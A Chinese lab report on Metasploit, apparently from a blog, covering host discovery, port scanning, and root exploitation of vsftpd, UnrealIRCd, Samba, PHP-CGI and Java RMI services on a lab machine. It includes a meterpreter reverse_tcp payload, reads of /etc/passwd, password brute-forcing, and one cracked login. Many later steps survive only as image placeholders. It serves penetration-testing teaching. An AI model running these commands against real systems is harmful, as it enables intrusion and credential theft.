网络安全实验报告 第五章

Metasploit基本介绍与配置

Metasploit作为一个非常全面的渗透工具,用来收集信息非常好用,信息收集的方法主要分为主动和被动方式。被动信息收集是指在不直接接触目标系统的情况下,获取目标主机的信息。比如,通过搜索引擎方式可以获得目标主机操作系统,开放的端口号。主动信息收集是指可以通过扫描目标系统来确定目标主机开放的服务。主动收集信息的方法被IDS和IPS记录的概率加大。
Metasploit中不仅能够使用第三方扫描器,例如nmap工具。还可以利用其辅助模块中包含的端口扫描功能发现活跃主机,这些模块位于Metasploit源码路径的modules/auxiliary/scanner/discovery/目录中,主要有arp_sweep、udp_probe、udp_sweep等。其中arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机,udp_sweep通过发送UDP数据包探查指定主机是活跃,并发现主机上的UDP服务。

1.2 在终端输入命令msfconsole命令,启动Metasploit终端,界面中会显示集成攻击模块、辅助模块、攻击载荷模块等。



1.3 在msf命令行下,启用arp_sweep模块。输入命令use auxiliary/scanner/discovery/arp_sweep,启用已经启用了arp_sweep模块。



1.7输入命令run开始扫描。

1.9输入命令run,查看结果。



1.10 发现活跃主机后,扫描一下主机的开放端口都有哪些,利用search portscan命令找到相关的工具。
1.11 下面先使用syn端口扫描器进行扫描,启用syn扫描器,输入命令:use auxiliary/scanner/portscan/syn,显示参数设置完毕。
1.12 在终端下输入run,显示目标主机开放的端口号。注意:如果端口扫描失败或者端口扫描得到的结果不理想,可以重新打开一个终端,使用nmap -sV 192.168.1.3来进行端口扫描,进而得到我们需要的结果。

1.13 在扫描过程中,可以针对某个已知的漏洞来对目标系统进行扫描,例如上图中的21端口开放着,那么利用ftp_version模块对主机进行扫描。输入命令:use auxiliary/scanner/ftp/ftp_version 启用模块,设置扫描参数,显示开启了FTP服务。

1.14利用自带的anonymous模块检查一下是否允许匿名登录。输入命令:use auxiliary/scanner/ftp/anonymous模块,设置相关参数。然后输入命令run。

如何针对多台主机进行扫描?


Metasploit溢出vsftp特权提升漏洞

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放21端口并且安装vsftpd服务器软件,版本为2.3.4。



1.3 在终端中输入命令“msfconsole”,启动MSF终端。
1.4 在终端中输入命令“search vsftpd”,搜索vsftpd的相关工具和攻击载荷,显示vsftpd v2.3.4版本的漏洞利用模块。



1.5 在终端中输入命令“use exploit/unix/ftp/vsftpd_234_backdoor”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。

1.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。
1.8 在终端中输入“show payloads”, 显示Metasploit中可以在远程主机执行的代码,即shellcode。



1.9 在终端中输入“set PAYLOAD cmd/unix/interact”, 选择在远程主机执行的shellcode代码。
1.10 在终端中输入“exploit”, 实施攻击。攻击成功后,输入命令“ifconfig”,查看IP为目标主机,表示溢出成功。

1.11 在终端中输入“whoami”,查看获得的权限为root,输入命令“cat /etc/passwd”,查看系统的帐号和密码。

Metasploit辅助模块案例

Metasploit是一款开源的安全漏洞检测工具,帮助使用者识别安全问题,验证漏洞存在的有效措施,并对某些软件进行安全性评估,提供真正的安全风险报告。Metasploit软件提供多用户接口,包括终端、命令行和图形化界面。

1.3 利用arp_sweep模块扫描一下局域网内的活跃主机信息。
1.4 在msf终端中输入”set RHOSTS 192.168.1.0/24”命令,然后使用“show options”查看设置完的参数。
1.5 在msf终端中输入”show options”命令列出arp_sweep模块的各项参数设置,查看设置完的参数。



1.6 在msf终端中输入”help”命令,查看可以使用的命令。
1.7 在help命令中提示,auxiliary模块要使用run模块运行。在msf终端中输入”run”命令,查看运行效果,从输出信息可知,局域网中只有192.168.1.3一台主机在线。Arp_sweep模块只能探测同一子网中的活跃主机,对于远程主机,可以使用nmap扫描器。



1.9 可以利用metasploit中集成的端口扫描模块了解活跃主机的详细信息,在msf终端中输入search portscan命令,查一下都有哪些可利用的模块。简单介绍一下扫描方式:auxiliary/scanner/portscan/ack 通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测;auxiliary/scanner/portscan/syn 通过发送TCP SYN标志的方式探测开放的端口;auxiliary/scanner/portscan/tcp 通过一次完整的TCP连接来判断端口是否开放;auxiliary/scanner/portscan/xmas 通过发送FIN、PSH、URG标志,能够躲避一些高级的TCP标记检测器的过滤。
1.10 下面利用syn端口扫描模块对目标主机扫描,收集详细信息,在终端下输入“use auxiliary/scanner/portscan/syn”,应用此模块。
1.11 在终端中输入“set RHOSTS 192.168.1.3”,设置扫描目标主机IP,输入命令run进行扫描。注意:如果端口扫描失败或者端口扫描得到的结果不理想,可以使用nmap -sV 192.168.1.3来进行端口扫描,进而得到我们需要的结果。

1.12 利用metasploit端口扫描辅助模块确定开放端口,然后对相应端口上所运行服务的信息进行更深入的挖掘。在Metasploit的scanner辅助模块中,[service_name]_version用于遍历网络中包含了服务版本,[service_name]_login对服务进行口令探测。
1.13 在msf终端中输入”use auxiliary/scanner/ftp/ftp_version”命令,查看可以使用的命令.
1.14 在终端中输入“set RHOSTS 192.168.1.3”设置扫描主机IP,在终端中输入run进行扫描,从输出显示,主机为windows系统,开启FTP服务。



1.15 输入search ftp_login命令,搜索ftp_login模块,尝试进行口令试探攻击。

1.16 在msf终端中输入”use auxiliary/scanner/ftp/ftp_login”命令,应用此模块。
1.17 利用set命令设置攻击模块的各项参数,然后输入run命令运行攻击,显示administrator/Simplexue123账号登陆成功。

二、课后习题
在使用ftp_login模块时,可以使用密码表进行破解吗?

beef+Metasploit利用浏览器获得shell

1.7输入命令“/etc/init.d/postgresql start”,启动postgresql服务。输入命令“msfdb init”,初始化数据库。



1.8在终端中输入“msfconsole”启动metasploit模块,输入命令”load msgrpc ServerHost=192.168.1.2 Pass=abc123”。 如图8所示



1.10在终端输入命令“./beef -x”加载模块。

Metasploit溢出UnrealIRCd后门漏洞

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd。如图2所示



1.4 在终端中输入命令“search unreal ircd”,搜索ircd的相关工具和攻击载荷。如图4所示



1.9 在终端中输入“whoami”,查看获得的权限为root,输入命令“cat /etc/passwd”,查看系统的帐号和密码。如图9所示

Metasploit溢出sysmlink 默认配置目录遍历漏洞

1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。如图1所示



1.4 在终端中输入命令“search samba”,搜索samba的相关工具和攻击载荷。如图4所示



1.9 在终端中输入“exploit”, 开始攻击。如图9所示

1.12在终端中输入“more /etc/passwd”, 查看目标主机系统中的密码。如图12所示


Metasploit溢出samba提权漏洞

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放445端口、139端口并且安装samba软件,版本为3。如图2所示

image.png

1.3 在终端中输入命令“msfconsole”,启动MSF终端。如图3所示

image.png

1.4 在终端中输入命令“search samba”,搜索samba的相关工具和攻击载荷。如图4所示

![Uploading image_247499.png . . .]

1.5 在终端中输入命令“use exploit/multi/samba/usermap_script”,启用漏洞利用模块, 提示符就会提示进入到该路径下。如图5所示


image.png

在终端中输入命令“info”,查看需要设置的相关项,“yes”表示必须填写的参数。

image.png

1.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。如图7所示

image.png

1.8 在终端中输入“exploit”, 开始向目标主机攻击,攻击成功后,建立会话。如图8所示

image.png

1.9 在终端中输入“whoami”,查看获得的权限为root,输入命令“ifconfig”,查看系统的网络信息。如图9所示

image.png

Metasploit溢出phpMyAdmin漏洞

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放80端口。如图2所示

image.png

1.3 在浏览器地址栏中输入“http:\192.168.1.3”,访问目标网站。如图3所示

image.png

2.1 在终端中输入命令“dirbuster”,启动软件对目标网站进行扫描。如图4所示


image.png

2.3 扫描结果显示包含cgi-bin目录、phpmyadmin目录等。如图6所示


image.png

3.1 在终端中输入命令“msfconsole”,启动MSF终端。如图7所示


image.png

3.2 在终端中输入命令“search php_cgi”,搜索php_cgi的相关工具和攻击载荷。如图8所示


image.png

3.3 在终端中输入命令“use exploit/multi/http/php_cgi_arg_injection”,启用漏洞利用模块, 提示符就会提示进入到该路径下。如图9所示


image.png

3.4 在终端中输入命令“show payloads”,显示Metasploit中可以在远程主机执行的代码,即shellcode。如图10所示


image.png

3.5 在终端中输入命令“set PAYLOAD php/meterpreter/reverse_tcp”,设置使用的shellcode代码。如图11所示


image.png

3.6 在终端中输入“show options”,显示攻击模块需要设置的参数。如图12所示


image.png

3.7 在终端中输入“set LHOST 192.168.1.2”,设置源主机的IP地址,用于会话的反向链接。如图13所示


image.png

3.8 在终端中输入“set RHOST 192.168.1.3”,设置目标主机的IP。如图14所示


image.png

3.9

image.png

3.10

image.png

3.11

image.png

3.12

image.png

Metasploit溢出java RMI SERVER命令执行漏洞

1.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放1099端口。如图2所示


image.png

1.3 在终端中输入命令“msfconsole”,启动MSF终端。如图3所示


image.png

1.4 在终端中输入命令“search java_rmi_server”,搜索RMI的相关工具和攻击载荷。如图4所示


image.png

1.5 在终端中输入命令“use exploit/multi/misc/java_rmi_server”,启用漏洞利用模块, 提示符就会提示进入到该路径下。如图5所示


image.png

1.6 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。如图6所示


image.png

1.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。如图7所示


image.png

1.8 在终端中输入“exploit”, 实施攻击,攻击成功后,建立连接会话。如图8所示


image.png

1.9 在终端中输入“sysinfo”,查看系统信息,输入命令“Id”,查看用户权限。如图9所示


image.png

Metasploit溢出Distcc后门漏洞

1.2

image.png

1.3

image.png

1.4

image.png

1.5

image.png

1.6

image.png

1.7

image.png

1.8

image.png

1.9

image.png

Metasploit批量验证爆破telnet

1.2

image.png

1.3

image.png

2.1

image.png

2.2

image.png

2.3

image.png

2.4

image.png

2.5

image.png

2.6

image.png

2.7

image.png

2.8

image.png

2.9

image.png

2.10

image.png

Metasploit对目标主机SSH爆破

1.2

image.png

1.3

image.png

1.4

image.png

1.5

image.png

1.6

image.png

1.7

image.png

1.8

image.png

1.9

image.png

1.10

image.png

1.11

image.png

1.12

image.png

Metasploit爆破Tomcat弱口令

1.2


image.png

1.3

image.png

1.4

image.png

1.5

image.png

1.6

image.png

1.7

image.png

1.8

image.png

1.9

image.png

1.10

image.png

1.11

image.png

1.12

image.png

1.13

image.png

1.14

image.png

1.15

image.png

1.16

image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,547评论 6 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,399评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,428评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,599评论 1 274
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,612评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,577评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,941评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,603评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,852评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,605评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,693评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,375评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,955评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,936评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,172评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 43,970评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,414评论 2 342

推荐阅读更多精彩内容